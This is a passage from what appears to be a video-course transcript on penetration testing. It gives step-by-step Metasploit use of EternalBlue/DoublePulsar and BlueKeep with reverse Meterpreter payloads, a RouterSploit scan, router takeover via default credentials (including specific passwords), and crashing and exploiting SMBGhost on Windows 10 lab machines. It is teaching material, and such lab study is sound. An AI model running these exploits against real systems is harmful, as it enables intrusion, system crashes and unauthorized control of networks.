will check the IP address.
Are you scared?
So it is 192.168.1.13. And one more thing I will check is whether the firewall is disabled. So I'll go to Control Panel, System and Security, and then Windows Firewall. It is open, so I will just close the Windows Firewall. And now if I perform the same exploit, just change the IP address to the IP address of this new Windows 7 machine, and I try to run it, it will start the same, just after a few seconds, this machine right here should crash. It even tells us right here, host is likely vulnerable to the MS-17, which is the Eternal Blue exploit. So let's see what happens. And here it is. You can see that the Windows machine crashed, and now it is restarting. Also here we can see that the exploit failed. Remember that we got the win message once we exploited the previous Windows 7 target, but right now the exploit failed. Matter of fact, in the second attempt of it exploiting the Windows 7 machine, it crashed the machine. So this is just an example that sometimes an exploit will not work. In the first one, we managed to gain the access to the Windows 7 machine with the Meterpreter shell, but in the second one, we only managed to crash it. However, even if you manage to only crash it, this is something that you will 100% write on a report. This is a vulnerability. You should never be able to crash a target computer just like this. Imagine if this Windows 7 machine was doing something important. And just us knowing its IP address and running this exploit, we managed to crash it. that could cause a lot of problems. Now, if you really want to get this exploit to work, you can try to find a different Windows 7 ISO file and try with it to see if it might work on that one. I would also advise you that if you can, you try to install a Windows 7 64-bit version. And in the next video, we are going to see how we can perform a slightly different version of this exploit using Eternal Blue double pulsar attack. In my personal experience, this one works a little bit better than the Metasploit version of Eternal Blue, and another interesting thing is that we don't have it inside of our Metasploit framework. So what are we going to do? Well, not only are we going to run it in the next video, but I will also show you how we can add the Eternal Blue double pulsar module to the Metasploit framework by ourselves. See you in the next video. Welcome back. Time to check out a variant of Eternal Blue exploit. I prefer to always use this one due to two different reasons. It showed to work more than the default Metasploit framework exploit, and it also has a little better options aimed at both 32-bit and 64-bit Windows systems. Nonetheless, we can read more about Double Pulsar right here. This is the official Rapid7 website, and here we can check out what exactly is a double pulsar, when it is used and when did it come out. So here it says double pulsar is an implant leaked by the Shadow Brokers group earlier this year that enables the execution of additional malicious code. So you can read right here, but you can also check out different websites in order to find out how exactly does the exploit work, in case you're interested in that. But what's important for us in this video is how to run the exploit. Remember, we have no module in Metasploit framework for the Eternal Blue double pulsar. So we must download the exploit ourselves and import it in Metasploit framework. This will be a little bit of a longer video since there are a few things that we need to do to achieve this exploit. The first thing that we must do is install Wine. And what is Wine? Well, Wine is a program that allows us to execute Windows applications on Linux systems. Why do we need this? Well, it is required for double pulsar to run. To install it, we can run the following commands: sudo dpkg add architecture i386, and then these two signs, which mean that we are going to add another command to this larger command, and that is apt get update, and another command is apt get install wine32. So these are three separate commands, and in the last one we're going to install the wine32. If you press enter and type in the password, this command should start executing. Now if it tells you right here this, which is permission denied, then just copy this command without the sudo, enter the root terminal by typing sudo su, and then paste the command. Press enter, and now it should start executing all of these three commands. Now I will Control C this because I've already performed this. For you, just wait for this to finish and then proceed with the tutorial. And the reason why we are doing all of this is because we need to get Wine directory with the drive C folder. And you might be asking, well, what is that and where do I even find it? Well, sometimes it won't appear after installation. So what we must do is install some Windows program. In this case, let's just go and install Python 2 for Windows on our Cal Linux machine. Not because we need it, but because after we install it, our drive C folder will appear. And if you have no idea what I'm talking about, hang on for just a second and you will see it after we install a Windows program. It is all required for our exploit to run. So navigate to this link right here, which is https www.python.org/downloads/release and then /python-2714 and / at the end. Here we should see this version of Python, and what we are interested in from all of these versions is Windows x86 MSI installer. Click on it and click on Save File. It will start downloading our Windows MSI installer, and once it has finished, we want to go to to the downloads directory and open terminal inside of it. Once it does that, we can run the command find msi execute /i and then the name of the file, which in my case and in your case will be Python 2.7.14.msi. Just a small interrupt, this command that I just showed you, make sure to execute it using root terminal. So don't execute it using our regular Mr. Hacker terminal, otherwise in most cases it might not actually work. So what you can do is you can just type sudo su, enter the password for your account and run the find msi execute /i and then the name of the file using root terminal. Okay, let's go back to the video. Click enter and this will start installing Python 2.7.14 as a Windows program. We want to click on next on every step, so next, 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 next. So this already exists, I will click on yes. And this installation should finish in just a few seconds. Once it is done, you can click on finish, and right now we should have our wine folder in the /root directory. So if I go to the /root directory, I need to go cd /root. Let us just enter the root terminal and go to the /root directory. If we type ls, it will be empty. Did we fail somewhere? Well, not exactly. Once installed, wine will be a hidden directory, which means its name will start with a dot. And by the way, to list all the files inside of a directory, including hidden files, we can run the command ls-la. And here are all the hidden files, including our .wine directory. Now, if you cannot see it, make sure that you run this command, which is wine msi execute /i Python 2.7.14 from the root terminal. And just click on next, next, next steps, and you should have this .wine folder inside of the /root directory. Great. So if I go to that folder, cd.wine, here I will have drive C folder and some other folders as well. So everything works for now. Now that we got this ready, we can proceed to download our exploit. So go once again to the Firefox, open a second tab and type eternal blue double pulsar. And it will show up this first link, which is a GitHub link. We want to click on it. And since we already know how to install a GitHub tool, let's just do it real quick. We just want to copy this link right here. Go inside our terminal. Let's change the directory to the /home/Mr. Hacker/desktop directory. And once again, I would advise you to run all of these commands using root terminal, otherwise it might not work. And type git clone, paste the command, and it should download the eternal blue double pulsar tool for us. Now, we are not done yet. We must do some modification in order for this tool to be able to open in the Metasploit framework. If I type ls and change to the eternal blue double pulsar, right here we should have two interesting files. One of them is the Ruby file, which is the exploit itself, and the other one is this deps directory. Now this is a directory once again, it is not a file, and you cannot really see that from the root terminal because different file types are not different colors. And that is the only problematic thing. But nonetheless, what we must do is we must copy these two files, so let's go with copy deps first, to the user share Metasploit Framework, modules, exploits, Windows, and then SMB, and here we can copy the deps directory. And to copy a directory, you just need to add -r at the end. So once again, copying deps directory to the /user/share/Metasploit Framework /modules/exploits /Windows and then /SMB. Click enter and it should copy the deps directory there. We want to do the same thing with the eternal blue Ruby file, so copy to the same directory, modules, exploit Windows, SMB, and here we want to copy it. Just for this file, you don't need to add the -r since it is a file and not a directory. Okay, great. There is one more location that we want to copy both of these files, so I will just type once again the same command, just this time I will switch the location to the /root directory. So I will copy the deps in the /root, add -r at the end, and I will copy the eternal blue to the /root directory as well. Great, now we should be ready to go. Let us open our MSF console. While this is opening, make sure that your Windows 7 machine is up and running, and let us straight away check out the IP address of this Windows 7 machine by typing ipconfig 192.168.1.8 for me. And what we want to do once the Metasploit Framework opens up is we want to navigate to our Eternal Blue Double Pulsar exploit. And remember, we put it inside of the Windows exploit and SMB exploits. So what we can do is we can type use exploit Windows SMB, type the name of the exploit, which is Eternal Blue Double Pulsar. So just type Eternal Blue _ Double Pulsar. Click enter, and now we got our exploit imported in Metasploit Framework. This is an exploit that we didn't have before. Let us show information for it. As it says in the description, this module exploits a vulnerability on SMB version 1 and version 2 protocols through Eternal Blue. After that, Double Pulsar is used to inject remotely a malicious DLL. Great. Let's also show options to see what options we got. And up here, we got quite a few of them. And keep in mind that all of them are required. Now, here it tells us that we need to specify the path to the deps directory. So it seems that I made a mistake before. I copied it directly to the root directory, and we had to copy the entire file. So what I'm going to do is I'm going to open a second terminal, enter the root terminal, go to the desktop of our Mr. Hacker account, and copy this entire Eternal Blue Double Pulsar Metasploit to the root directory. So copy Eternal Blue to the /root. Make sure to add -r because we're copying a directory, and right now this path should be good and we should not really change it. We can just leave it right here, since deps directory is inside of the Eternal Blue Double Pulsar directory, and we just copied it to the root directory. So these two are good. Under the process inject, it tells us right here name of the process to inject to, and we must change to this process name right here for 64-bit machines. Since my Windows 7 machine is a 64-bit, I will type this name right here. And I will change the process to inject since it is not set right here by default. So type set process inject and paste the name of the process and press enter. If your Windows 7 machine is a 32-bit one, you can leave this wlms.exe process to inject to. The R hosts we already know to be the IP address, so 192.168.1.8. The R port we're going to leave to 445. The target architecture, if your Windows machine is a 32-bit, you can leave it to x86. Mine is 64-bit, so I will set the target architecture to x64. The wine path, and this is why we needed the wine for. We need to set the wine path in order for all of this to work. And right here it is set correctly. Remember, our .wine folder is inside of the root directory, and the drive C folder is inside of the .wine directory. So this is something that we will not change. Another configuration that we want to do is this payload options right here. It is currently set to Windows Interpreter Reverse TCP. And remember, in one of the last few videos I told you that this is a payload for 32-bit Windows. If your Windows is 32-bit, once again, you don't need to change this, but if it is a 64-bit Windows, I want to type set payload Windows x64 /meterpreter /reverse TCP. Show options once again. Everything seems to be good now. You can also show targets if you want to, just to see what are all the possible targets that you can attack with this exploit. And once you check all of that out, you can just type run. This will launch our Eternal Blue Double Pulsar exploit on the target machine. It might take a few seconds for it to work, and here it is. Our Meterpreter session is once again open. Exploit works successfully, and we can once again run the commands on the target system. We can enter a shell and get its command prompt. If I type who am I, it says that we're the system level account, so we're the highest privilege account once again. Great. Now, I know that you're impatiently waiting for us to cover this Meterpreter shell and all of its commands, as well as the post-exploitation modules that we can run with it, but hang on for just a little bit more. We got 2 more exploits to cover, and then we can proceed to creating our malicious files and using them, as well as running post-exploitation modules. In the next video, we're going to cover an exploit called Blue Keep, which was discovered in 2019. See you there. Welcome back, and we right now have to cover another vulnerability for Windows. This vulnerability is called Blue Keep, and it came out in 2019. This is a remote desktop protocol, or RDP vulnerability, and what is so special about it? Well, as it says right here on this page, this latest RDP vulnerability could allow hackers to remotely run code at the system level without even having to authenticate. In other words, any unpatched Windows system, from XP to Windows 7, so these are our targets, with an exposed RDP port is a potential target. So this is a serious vulnerability. Matter of fact, many people link it to be as high vulnerability as the Eternal Blue was, which we already covered and which came out in 2017. We can read more about it right here, but as usual, our most important thing is to see how we can exploit it. You can go to this page if you want to find out more about the Blue Keep vulnerability. It even gives some code examples as to what the vulnerability was and how it got patched. Down here, we can see what systems are affected. We got Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Server 2003, Windows Vista, and Windows XP. Exploit potential, it is a remote code execution, as the Eternal Blue was, and number of potential victims are around 1 million. Now, for this attack to work, there is one thing that needs to be enabled on the target system, and that thing is port 3389. Now, this port 3389 is used for remote desktop protocol, and it is often used inside of big and large companies. You will most likely never see it on home devices, unless it is purposely enabled, but in order for us to be able to exploit it, we must enable it on our Windows 7 machine. So what I'm going to do is go to my Windows 7 machine and open the Cal Linux as well. In order to see whether it is enabled, we can use our regular good old nmap, so we can type sudo nmap-ss 192.168.1, and let me check the IP address. ipconfig .8. Perform the scan on your Windows 7 machine, and in just a few seconds we should get results of which ports are open. And right here we do not see port 3389 being open. This means this target is not vulnerable, because that port is closed. In order to make it vulnerable, all we need to do is open the remote desktop protocol. So go to the control panel, system and security, then under the system, on the side you will see this remote settings, click on it, and down here check allow connections from computers running any version of remote desktop. By default it should be don't allow connections to this computer. And as I already mentioned, many large companies have this enabled. We just click on apply, click on OK, we can close this, and if we run the scan once again, right now we will have 3389 port open. Let us see whether it is vulnerable or has it been patched. If I open MSF console, and the exploitation is similar as it was with the Eternal Blue. We got the auxiliary module that will tell us whether the target is vulnerable without exploiting it, and then we have an exploit that will gain access to the target and give us the Meterpreter shell. So what we can do is we can just type the vulnerability name, so search bluekeep, press enter, and we will see two results right here. As I mentioned, the auxiliary module and the exploit. So let's go with the auxiliary module first. We copy its name, we use and then paste the name of the auxiliary module. Clear the screen, show information. This module checks a range of hosts for the bluekeep vulnerability by binding this channel outside of its normal slot and sending non-DOS packets which respond differently on patched and vulnerable hosts. So this is the way that it will figure out whether the target is vulnerable or not. Let's see what options we need to set. So show options, and there seems to be a few of them. We got the R port, which is 3389. This is something that we will not change. We got the R hosts, so let's set it to the IP address of the Windows 7 machine. We got these four options right here as well, but the only one that is required is this RDP client IP. And it says right here the client IPv4 address to report during connect. And this pretty much doesn't matter. It can be any IP address. For example, I will just leave it to be this one, even though this is an IP address that I do not have on my local network. But I will just leave it on this. And if I go right here and type run, it will tell me the target is vulnerable. The target attempted cleanup of the incorrectly bound MS-T120 channel. This means it is vulnerable. Let's use the exploit to gain access. So use exploit, Windows, RDP, and then let's check our possible options. We want to go with the CVE 2090 bluekeep remote code execution. If I show info, down here it will tell you how exactly it exploits the target. And if I show our available options, so we got pretty much the same options as with the auxiliary module. We got the RDP client IP, which is this one, and we are not going to change it once again. These options are not required, so we're not going to specify them anyway. The R hosts we want to set to the IP address of Windows 7 machine. The R port is set correctly. The payload is set to Windows x64 Meterpreter reverse TCP, and this is also something that we do not want to change. Is this the only payload that will work? Well, most likely, since if I go to show targets, you will see that this exploit targets only 64-bit machines, so it will not be able to run on a 32-bit machine. So by this, it seems that 32-bit Windows 7 machines and Windows Servers 2008 are not vulnerable. Which we really don't care, because 99% of machines are 64-bit. And these targets right here is something that we must choose from. Now, this is for default and normal Windows machines. And right here we have targets for the virtual machines. And this is something that we must set. If we leave it on automatic, it should figure out on its own that we are running Windows 7 inside of a virtual box, and it will perform the exploit for the VirtualBox Windows 7 version. But if we, for example, set this one, the exploit should not work. So we must set the target to 2, in case we are running the Windows 7 inside of a virtual box. If we were attacking a regular Windows machine that is vulnerable, we would set 1. If we were attacking a virtual machine from the VMware station, we would set one of these 3, and we would set these 2 accordingly as well. So let's triple check our options. Everything here is set. The payload is a 64-bit payload, which is good, and the target is Windows 7 inside of a virtual box. Great. Let us run the exploit. It tells us that the target is vulnerable, and in just a few seconds we should get the Meterpreter shell opened on that Windows 7 machine. And after 30 to 40 seconds, here it is. We got Meterpreter session 1 opened on the target machine. If I type get user ID, it will tell me that we are system, once again the highest privilege account on that target machine. We can perform the commands as usual. Enter the shell, type hostname, we are test2 PC, ipconfig, gives us the IP address of the target machine, and all of these things that we're already familiar with. Great, another Windows 7 vulnerability covered. So, what is the important thing that we learned from this video? The vulnerability is called bluekeep, It is a critical RDP or remote desktop protocol vulnerability, and in order to exploit the target, it must be an unpatched 64-bit Windows XP to Windows 7 machine, including Windows Server 2008, and it must have RDP enabled and port 3389 open. Where are these machines most likely to be found? In large companies. So once again, most likely we will not see these types of targets in home networks. Okay, great. Now that we covered Windows 7 vulnerabilities, time to go on to exploit Windows 10 machine. See you in the next video. Welcome back. In this and in the next video, I want to talk about something different. We attacked different machines, from Windows machines to Linux machines, but in these two videos I want to show you that you can also target your own router, or the router from the network that you are attacking. Now, it might seem that it is not that important to test your router, but once you gain access to the router, you pretty much have the control over the entire network. And not only that, gaining access to the router is powerful. It means that you can change different network settings, that you can forward different ports, and so on and so on. The routers are also the easiest devices to hack. You might be asking, why? Well, because usually 90% of home routers and home devices have default login passwords. The vendors who provide homes with their routers never really change the default password, and default password is something that you can find on the internet. These default password attacks we're going to check out in the next tutorial, but for this one I want to show you a cool tool that you can use to test on your own router to check out whether it is vulnerable to some exploits. So just type in your search bar Routersploit and it will lead you to this GitHub link where we will have our Routersploit tool. Now we already know how to download all of these GitHub tools, so let's copy the link straight away, navigate to our desktop, and we can git clone Routersploit. While this is copying, let's go down to the installation commands just to see how we can install this tool properly, and here we have installation of Kali Linux and all of the commands that we must run. So we must install python3.pip, even though I believe we already have this. Let's run the command just to make sure, and it requires root privileges, so let's enter the root account first and let's type the same command, apt-get install python3.pip. Everything is installed. Let's move on to the next command. We already did the git clone. Let's change the directory to Routersploit. And the next command is python3, and then install the requirements. As we can see, inside of the Routersploit directory, we have requirements.txt file. And whenever you have this requirements.txt, we already know that we must run this command to install all the requirements from that file. Let's press enter. As soon as it installs all of these files that it needs, we should be ready to run the Routersploit tool, which is this rsf.py. Okay, so everything is finished, and let's python3 rsf.py. And you will notice that once you run this tool, it will open something that looks similar to the MSF console. We get this command line type, and here we can execute different commands. It says right here that it has 132 exploits, 4 scanners, 171 credential attacks, 4 generic attacks, 32 payloads, and 6 encoders. Now, to check out all of the available commands, we can run help command, and it will tell us how to use a certain module, how to execute a shell command argument, and here we can also search for different tools. Now, if we type search scanners, it will give us all of the 4 scanners that it has. And in this video, we're going to use this AutoPWN scanner. This will test for all the exploits from the Routersploit tool onto our target router to see whether it is vulnerable to any one of them. So let's type use scanners and then AutoPWN. Once you select it, you can type help or pardon me, you can type show options, the same way that we do inside of the MSF console, and the only thing that we must set is target IP address. To do that, we can type set target 192.168.1.1. This is the router in my case. If you want to check out your gateway or your router, you can type the command netstat-nr, and under the gateway you will have the IP address of your gateway. Once you check it out, type it right here, and as soon as you set your IP address, you can type run. As it says, it will start the vulnerability check, and it will go through all of these exploits and see whether your router is vulnerable to any one of them. If you have this minus sign, that means that the router is not vulnerable. If you have this star sign, that means that Routersploit cannot really determine whether your router is vulnerable to this security threat. As it says right here, it could not be verified. And if you have a plus sign, which we don't have at the moment, that means it found a security vulnerability for your router. In my case, I believe I don't have any at the moment, but you might find some vulnerability for the router. Let's wait for this scan to finish. And it is done. It says could not confirm any vulnerability, and it couldn't find default credentials. And this part right here is not exactly true. We're going to check out default credentials in the next video. However, you can test these exploits with the Routersploit tool. You can also check out these ones that says could not verify exploitability. This could possibly mean that they are vulnerable to these attacks, or this exploit is simply just not the type of exploit that targets your router. Okay, now that we covered the Routersploit tool, we're going to see how we can gain access to the router with the default credentials vulnerability that at least 70 to 80% of home routers have. See you in the next video. Welcome back. Time to check out the default credentials vulnerability on your router. Now, this tutorial is something that you cannot follow, because this is going to be different for every type of router that someone has. I can just show you the process of how I went and discovered the default credentials, and you can try to do the same thing in order to see whether you can gain access to your router. So the first thing that I did is I typed netstat-nr to check out the IP address of my gateway, which is most likely going to be the IP address of your router. Then I went to Google Chrome and visited that IP address. If you do the same for your router, it will most likely lead you to some type of a login page where it will ask you for the username and the password. Once you type the username and the password, you will have access to the router settings, and you will be able to change a few things here and there, from setting up wireless to port forwarding and similar settings like that. Now, if you haven't changed the default password for your router, you will most likely be able to find it on the internet. Which I did. I just searched the name of the router that I have right here, and I found the username to be telecom and password to be telecom. Nobody changed this username and password, therefore they're exactly the same. And we even get this warning that says a data breach on a site or app exposed your passwords. Chrome recommends changing your password for this IP address now. We're going to click on OK, and pretty much we already gained access to the router settings. We can set up the firewall, Vlan settings, we can check out different settings that we have right here. We have some security settings right here. We also get the port forwarding, which we can perform. And this is something that I tested on multiple home routers, and many of them appear to have default credentials where it allows you to log into the router and change these type of settings. But these are not the only default credentials that you can find. For example, if I go right here and I run an nmap scan with -st command on my router IP address, I will also discover that it has some ports open. For example, it has this telnet port open. We already know how we can connect to the telnet. We can type the command telnet and then the IP address of the target that we want to connect to. If I press enter, we will get another login screen. So if I type something like telecom once again, it will tell me that the password isn't correct. So after 3 attempts, it simply just closes the connection to the router. And I figured, well, if the router default credentials weren't changed, then probably I can find the telnet credentials as well on the internet. And after a few minutes of googling, I ran across this website where I scrolled a little bit down and I found this post that was posted by someone. It says my router name, which is this one, and we can compare it right here. It is the same name, and we get the username and password. We also get how we can enable the shell inside of that router. So let's give it a try. The username is admin and the password is this. Let's go and run telnet once again. Type username to be admin and password to be ZTONPK. And here it is, we're inside of CLI. Now, the next thing that this person does is it types enable. Then it enters the password of ZTE and then it enables shell. Let's give it a try. If I type enable, type ZTE, and then shell, another login attempt. But luckily this person also provided us with username and password for that. This is something that we will most likely never be able to brute force in case we didn't know, because this is a really strong username and strong password. However, it is default one, and this is something that we can find on the internet. For your router, of course, this will not be the same, but you can go through the same process of searching for the default credentials. Just figure out the name of your router, type it in Google, and try to find some default credentials. For example, we notice that I have open port SSH and telnet. You might be able to target SSH and not telnet, or you might be able to target some different port. It could all depend on your router. However, now I'm targeting telnet, and let's go and type in the username and password that this person sent us. So I have it written on my left screen, and I will type FNNSD3ZX HNH168 and B31. For some reason it says bad username. Let's try once again. Maybe we typed something incorrectly. So let's go admin, password, let's enable. The password is ZTE, and let's go into shell. Here we want to type FNNSD3ZX HNH168 and V31, which is the login, and the password is ZXHNH168 and V31. And here we are. We are inside of the shell. If I type ls, we're going to be able to see the files on our router. I can type the ifconfig command to be able to see all of the interfaces that our router has. Here the first interface has the IP address of 192.168.1.1, and down here we're also going to be able to find the public IP address, which is right here. Okay, great. We have gained access to the router. We can also go and change directories to different directories if we want to. We can run different commands that you can usually run from your terminal, and that's how you can gain access to your router with default credentials. Now give it a try on your own router. Try searching the name of the router. First try logging into this page right here, which will grant you an access to some of the router settings. And even if you don't manage to do that, try scanning your router with Nmap, figure out whether it has some interesting ports open, and then target those ports with default credentials that you might manage to find online, just like I did right here. Okay, now that we covered this, we're ready to continue with our exploitation section. See you in the next video. Welcome back. In this small section, we're going to cover SMB Ghost Windows 10 vulnerability. Since there is no module available for the Metasploit Framework regarding this vulnerability, we are going to need to exploit it manually. And by manually, I mean we will have to find a working exploit ourselves, run it ourselves, and redirect the connection to our Kali Linux machine ourselves. All of these tasks Metasploit Framework did for us automatically, and since we can't really rely on tools, we're going to learn through this Windows 10 vulnerability how we can do all of that ourselves. Now, the vulnerability that we're exploiting is rather new. I believe it got disclosed in June 2020, and for this we will need to install Windows 10 virtual machine. Not all versions are vulnerable since it got patched, so we will have to install a vulnerable version of Windows 10 machine. Since this as well is an SMB vulnerability, we won't need any additional software to run on our target machine for this exploit to work, which makes it even more dangerous, just like the previous two vulnerabilities, which were Eternal Blue and the Blue Keep, but they were attacking Windows 7. This one attacks Windows 10. All our target needs to have is port 445 open and some previous version of Windows 10. The exact vulnerable version that we are looking for is either Windows 10 1903 or Windows 10 1909. So you will need ISO file as usual to create this machine, and both of these versions are vulnerable to the SMB ghost attack. Let me show you right now where we can download previous version of Windows 10 ISO file. And by the way, we will be using this Windows machine in the next section as well to test the payloads that we will create. But more about that later on. For now on, let's focus on creating our virtual environment for this attack. So what you want to do first is you want to navigate to this rufus.ie website, and this software right here that we're going to download is used to create bootable USB drives with the ISO files. Now, you might be asking, well, why are we going to need this? We're not going to boot into our computer over USB drive, we are installing a virtual machine, and that is true. But this software also offers us to download some previous versions of Windows 10 operating system. That's why you want to go down here, click on this Rufus 3.11 and download the file. It is the size of 1.1 megabyte. Once you download it, you should be having this file right here on the desktop. Double click on that file and it will ask for the administrator password. You want to click on yes or type in the password. And right here where we want to go is this arrow next to the select button. Now here's a small advice. Sometimes this arrow right here will not appear, and it actually didn't appear to me once I downloaded this software for the first time. So what I did is I tried restarting this program several times, so just close this, open this again, close it and open it again. That might work, and what also might work is going right here to the application settings and changing this check for updates. Then click on close, restart the program, and eventually this arrow right here should appear. Once it appears, click on it and click on download. And once you select the download, click on download once again, and this will start running download script. In just a few seconds, you should have this small window pop up. Here we want to select what operating system we want to download. If I click on here, it will ask me if I want Windows 8 or Windows 10. I want to select Windows 10, click on continue. In the next step, it will ask me which exact release do I want to select, and right here we want to go with this one, which is 19H1 build 18362.356, and it says right here the date is 2019 September or 9th month. So click on this right here, then click on continue. You can select Windows 10 Home, click on continue here as well. Language we can leave on English. And the last step, which is architecture, we can leave on x64. Then you can click on download right here, or you can download using a browser. If you simply just click on download, it will open the file explorer, and here you can pick where you want to save it on your desktop. Keep in mind that the size of the file is around 5 GB, so this will take some time. Since I already have it downloaded, I will not be downloading it again. For you, just wait for the download to finish and you should have a Windows 10 ISO file ready. Make sure that you pick the exact same version that I did right here, and once all of that is finished, you can close this program. The next step is to install Windows 10 virtual machine. So I already got one running right here, and for you, you can do it the same way that we did with any other machine, so just type Windows 10, select right here Microsoft Windows, Windows 10 64-bit, click on next, choose 2 GB of RAM, or choose the same amount of RAM that you used for the Windows 7, click on Next. Here we want to create a virtual hard disk. All of these steps we can next. Here I got 25 GB in my case, and you can choose whatever you want right here, and this will create your virtual machine. Now, since I already have it, I will delete it, but before I delete it, another 2 settings that you want to choose is, as we did with the Windows 7 machine, under the storage, under the empty, you want to remove, and you want to add the Windows 10 ISO file, which I have right here. The next setting that you want to change is from NAT to bridged adapter. Once you do all of that, you can start the process of installing Windows 10. Now, there is not any important step in Windows 10 installation, so you can do it however you want, but just a pro tip, once it gets to the part where it asks you for the account creation, where you need to specify an email address and all of that, you can skip that part by unplugging your device from the internet, and then it will allow you to create an offline Windows account, so you won't need to create an email for the Windows 10 account. All of the other steps are not important, you can do them as you like, and once you do all of that, you can start your Windows 10 machine. Another thing that we need to do to get our Windows 10 machine fully ready for this attack is to disable the firewall. So go down here, type Control Panel, and the way we disable it on Windows 10 is the same way that we disable it on Windows 7. So click on Control Panel right here, click on System and Security, click on Windows Defender Firewall, and turn it off in this button right here which says Turn Windows Defender Firewall on or off. Mine is currently off. Once you do that, everything is ready and you should be good to go for the next video, where we're going to try to search for the exploit for this particular attack. See you in the next video. Welcome back. And now that we got our Windows 10 machine set up, we want to perform a vulnerability scan real quick to see whether it is vulnerable, and then I will show you a tool that we can use to crash the target system. So first of all, open up both of your Cal Linux and Windows 10 machines. Right here I ran the ipconfig command to check out the IP address of the Windows 10 machine, and what I'm going to do is I'm going to scan it real quick just to see what ports it has open and whether our setup was correct from the previous video. Okay, great, we got the port 445 open. That is all we need. Now, I have also performed a Nessus vulnerability scan this morning on Windows 10 machine, and for some reason it didn't manage to find this SMB Ghost vulnerability. Now, that could be some type of a bug, maybe, perhaps, since if I type locate and then the vulnerability name, which is CVE-2020-0796, and this is just the name for this particular vulnerability, and I type enter, here it will find the path to the Nessus with the module for that vulnerability. So it seems that it has a plugin for that vulnerability and it should be able to discover it. But once again, for me personally, it didn't manage to find it. You can try it out. You know right now how to use Nessus, so just open it up, open your Windows 10 machine and run a scan in Nessus on your Windows 10 machine and see if you can come up with this vulnerability from there. But what we want to do right now is we want to copy this name and we want to go to the Firefox. Since, remember, this is something that we do not have in Metasploit Framework, we must find the exploit ourselves. Once the Firefox opens up, paste the vulnerability name right here, and I will just type it real quick to 2020-0796. And we can add GitHub. Let us check out whether there are some available tools on GitHub repository. So we got a few responses right here. And what we want to go with first is the vulnerability scanner. And what I mean by vulnerability scanner is we want a tool that will tell us whether the target machine is vulnerable to this attack without crashing or exploiting it. So we'll go to this link right here, and it seems that this is the tool that we need. It says the vulnerability name, scanner.py. identifying and mitigating the CVE 2020-0796 flaw in the fly. So let's check it out. Let's copy the name of this vulnerability. Then we will go to our desktop and we will git clone that repository to our desktop directory. Once it finishes downloading, we can type ls. Here it is, right here. Let's change directory to there by typing cd, and let's see which files we have. So we have only this scanner.py file. So it is a Python file. Let us go to this page and just check real quick whether it is a Python 2 or 3 program, and by the usage that we can see right here, it seems that it is a Python 3 program. So let's test it out. If I go right here, check out the IP address of Windows 10 machine. For me it is 192.168.1.5. Let's run the program, Python 3, and then type the IP address. Well, we get a response that we wanted. It says right here, vulnerable. Great. Now we can test other tools that will crash and exploit the target. First, I want to show you a tool that you can use to just crash the target. And with this tool, we don't need anything else besides the IP address of the target machine. So you can crash any target just by knowing its IP address. For the exploit that we will cover in the next video, we're going to cheat a little bit. We need something in order for the exploit to work. And I will show you that in the next video. For now, we want to see how we can crash the target machine. So if I go all the way down, you will see this GitHub link. It is from Gian Sitting, and it has the name of our vulnerability. If I go right here, we can see we got a few files. Once again, this is a Python tool. Under here we got the usage, so we got a demo GIF. Here we can see the command that he is running, and if we go right here and copy the tool, and once again we can go to our desktop and git clone the tool name, the link, paste right here, wait for the download to finish, and if I type ls, we now have two directories. This one is the scanner and this one is the one that we just downloaded. So let's go cd, cve, we got the demo GIF, the readme file, and the vulnerability itself. Of course, if we want to, we can nano the vulnerability file or the Python file, and we can scroll all the way down to see the code of this exploit, and down here we get the usage. So all we need to specify, as it says right here, is the target IP address. Let's try it out. If I go right here and type Python, I believe it's Python 3 once again, and then cve.py, and then the IP address of the target machine. Before I run it, I will lower this screen so we can see both of our targets before running this program. And right here, if I press enter, well, here it is. We successfully crashed the target machine. It got the blue screen of death, as we can see right here, and it is now restarting. And this is also a critical vulnerability. Once again, I need to mention that you should never be able to crash the target machine just by knowing its IP address. This is something that we would also 100% write down inside of our penetration testing report. Now that we managed to scan the target to see whether it is vulnerable, and we used another tool to crash the target, let's see in the next video how we can exploit the target machine and gain shell back inside of our Cal Linux machine. See you in the next video. Welcome back. Time to gain access to our Windows 10 machine using the SMB Ghost vulnerability. For now we managed to scan it to see if it's vulnerable, and we also managed to find a tool that we can use to crash the target system. But ideally, we don't want to crash it. Instead, we want to gain shell on that target machine. Well, with this vulnerability, it is not that easy. There are some things that we need to know in order to be able to remotely exploit it. Let's see what I mean. The first thing that we must do is we must download a tool that we are going to use for the exploitation. And I already checked a few of them out, and I found the best working one to be this ZecOps CVE vulnerability. If you just type the same thing that we typed from the previous video, which is the vulnerability name and then GitHub, you should find this ZecOps link to be on the first page. Click on it, and down here we can see the files that we get, and right here we also see the usage of the tool itself. But before we get into all of this, let us first download the tool from GitHub. So let's copy the link right here, copy, go to our terminal and type git clone and then the tool link. Press enter, and here it is, it finished downloading. Let us type ls and we will see a bunch of these directories with the same name. This one, however, has this extension of RCE and then POC, which stands for Remote Code Execution Proof of Concept. Let's change the directory to that directory. And if I type ls right here, we're going to see a bunch of files. So we get this .bat file, which runs on Windows. We get this SMB Ghost assembly shellcode for the 64-bit version. And we get this Python SMB Bleeding Ghost file, which is the exploit itself. But we don't really know how exactly do we combine all of these files. So let's go back to the page and check out the usage of the program. The first step right here tells us that make sure Python and Netcat are installed. Then run this .bat file on the target computer and adjust the offsets at the top of the SMB Bleeding Ghost.py file according to the script output. What does this mean? Well, let's go to the Python file first, let us nano it to see what offsets do they mean. And I assume they mean these offsets right here. As we can see, there are 5 of them and they have different offsets. But you might be asking, well, it tells us right here that we must run this on the target computer. And what's the point then of calling this an exploit if there is a file that we must run on the target computer first? Well, let's go to the note down here. As it says, you might be wondering why it is necessary to run the .bat file script on the target computer. And doesn't it defeat the whole point of the remote code execution being remote? Well, here is the explanation. These offsets are not random and are the same on all Windows instances of the same Windows version. One could make the attack more universal by detecting the target Windows version and adjusting the offsets automatically, or by not relying on them altogether. What does this mean? Well, these offsets right here are the same for the same Windows version. So for example, this Windows version that we got right here, if we had 1,000 machines that were running the same Windows version, well, it is enough that we run this .bat file on this one to check out the offsets, then we adjust the offsets right here inside of our exploit, and then we can attack all the 1,000 machines without having to run the .bat file on them. But a different version of this Windows machine might have a different offset, which will then make our exploit not work. So we must check the offsets first. How we're going to do that? Well, as it says right here, we're going to run the .bat file on the target system. So I already downloaded the tool right here on my Windows machine. Here it is on the desktop. And what you can do is you can just open the Windows 10 machine, open the Internet Explorer, type the vulnerability name and then GitHub, navigate to the ZecOps tool, and then if you click on it, click on this code arrow right here, and click on download zip. This will download the tool for you, and you should have it right here on the desktop right after it. Great. Once you do that, what we 